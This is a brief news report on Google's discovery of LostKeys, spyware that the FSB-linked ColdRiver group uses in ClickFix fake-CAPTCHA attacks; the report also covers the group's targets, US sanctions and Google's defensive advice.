Google has announced (via Android Headlines) the discovery of new Russian spyware called LostKeys, which is used by the ColdRiver hacker group linked to the Russian Federal Security Service (FSB). The software is designed to steal files and system data from Western organisations.

Details: The Google Threat Intelligence Group (GTIG) reports that LostKeys is used in targeted ClickFix attacks, based on social engineering and beginning with a fake CAPTCHA. Victims are deceived into running malicious PowerShell scripts, allowing additional malware to be downloaded and executed. The primary aim is to install LostKeys, which functions like a digital vacuum cleaner, extracting files, directories and system information. Hackers also deploy other malware, particularly SPICA, to retrieve documents.

The ColdRiver Group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. It has reportedly become more active in recent years, especially since Russia invaded Ukraine. The group specialises in cyber-espionage, targeting government and defence institutions, think tanks, politicians, journalists and non-governmental organisations.

The United States has imposed sanctions on individual group members and announced a US$10 million reward for information leading to their arrest.

Google experts emphasise the need to strengthen cybersecurity, especially for organisations that could become potential victims of ColdRiver attacks. They recommend using Google's advanced protection and regularly updating security systems to counter such threats.

